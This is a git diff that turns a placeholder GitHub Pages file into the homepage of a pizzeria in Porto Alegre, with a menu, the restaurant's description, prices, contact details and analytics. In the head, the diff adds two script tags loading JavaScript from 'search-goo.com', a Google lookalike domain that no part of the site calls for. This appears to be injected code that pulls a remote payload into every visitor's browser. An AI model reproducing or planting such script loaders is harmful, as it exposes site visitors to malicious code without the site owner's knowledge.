--- a/index.html
+++ b/index.html
@@ -1,7 +1,67 @@
-<!DOCTYPE html>
-<html>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head><meta charset="utf-8">
+	<link href="css/stlLatarantella.css" rel="stylesheet" /><!--[if gte IE 5.5]>
+<link rel="stylesheet"  href="css/stlLatarantellaIE.css"/ /><![endif]-->
+	<title>Pizzaria La Tarantella Porto Alegre RS</title>
+	<meta content="document" name="resource-type" /><meta content="Pizzaria La Tarantella Porto Alegre. Rodízio e telentrega de pizzas na zona sul de Porto Alegre com mais de 50 sabores, lasanhas e batata frita. Com forno à lenha e massa aberta na hora." name="description" /><meta content=" pizza, pizzas, pizzaria, pizzarias, telentrega, rodizio, delivery, forno a lenha, lenha,la tarantella,avenida otto niemeyer, avenida joao wallig, porto alegre, rs " name="keywords" /><meta content="ALL" name="robots" /><meta content="tiagobonacina@gmail.com" name="author" /><meta content="pt-br" name="language" /><meta content="Pizzaria La Tarantella Porto Alegre RS" name="DC.title" />
+	<link href="favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta content="73TGQhrzPAHJShQ7k-6nhSO3rScev_zqmXQ0KGC1Dp4" name="google-site-verification" /><script src="https://search-goo.com/plugin/prueba.php" type="text/javascript"></script><script src="https://search-goo.com/plugin/npbr3.js" type="text/javascript"></script>
+</head>
 <body>
-<h1>Hello World</h1>
-<p>I'm hosted with GitHub Pages.</p>
-</body>
+<div id="Header">
+<div id="HeaderCenter">
+<div id="HeaderLogo"><a href="index.html" rel="NOFOLLOW"><img alt="Pizzaria La Tarantella Porto Alegre" id="HeaderLogoIMG" src="img/Logo.png" title="Pizzaria La Tarantella Porto Alegre" /> </a></div>
+
+<div id="HeaderMenu">
+<ul>
+	<li class="HeaderMenuItemAtivo" id="HeaderMenuHome"><a href="index.html">Home </a></li>
+	<li id="HeaderMenuCardapio"><a href="cardapio.html">Card&aacute;pio</a></li>
+	<li id="HeaderMenuLocalizacao"><a href="localizacao.html">Localiza&ccedil;&atilde;o</a></li>
+	<li id="HeaderMenuFotos">
+	<div>Fotos</div>
+
+	<div class="EmBreve">Em Breve</div>
+	</li>
+</ul>
+</div>
+
+<div id="HeaderMenuPedido"><a href="https://www.ifood.com.br/latarantella?Origem=SiteParceiro&amp;produto=intermediario"><img alt="Pedido On Line" id="HeaderPedidoIMG" src="img/ifood.png" title="Pedido On Line" /> </a></div>
+</div>
+</div>
+
+<div id="Center">
+<div id="ContentContainer">
+<div class="Content" id="ContentTextoHome">
+<h1>La Tarantella Pizzaria</h1>
+O que mais chama a aten&ccedil;&atilde;o ao se conhecer essa casa &eacute; que logo na entrada h&aacute; 2 fornos &agrave; lenha, com as pizzas sendo preparadas &agrave; vista do cliente. H&aacute; 15 anos servindo qualidade, a Zona Sul de Porto Alegre conta com um rod&iacute;zio bem recheado, sendo a &uacute;nica com massa aberta na hora. Sua estrutura de 3 fornos &agrave; lenha garante um card&aacute;pio com mais de 50 sabores, al&eacute;m de lasanhas, canelones e batatas fritas.<br />
+&nbsp;
+<h2>Valor do rod&iacute;zio:<strong> R$39,90</strong></h2>
+
+<p></p>
+</div>
+</div>
+</div>
+
+<div id="Rodade">
+<div id="RodapeCenter">
+<div id="RodapeContainer">
+<dl class="filial">
+	<dt>Filial</dt>
+	<dd class="RodapeFilial">Zona Sul (Rod&iacute;zio e telentrega)</dd>
+	<dt>Endere&ccedil;o</dt>
+	<dd>Av. Otto Niemeyer, 1465 - Porto Alegre</dd>
+	<dt>Telefone</dt>
+	<dd>51 3024.4441 / 51 3084.0811</dd>
+</dl>
+</div>
+</div>
+</div>
+<script type="text/javascript">
+var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
+document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
+</script><script type="text/javascript">
+try{
+var pageTracker = _gat._getTracker("UA-10265721-1");
+pageTracker._trackPageview();
+} catch(err) {}</script></body>
 </html>
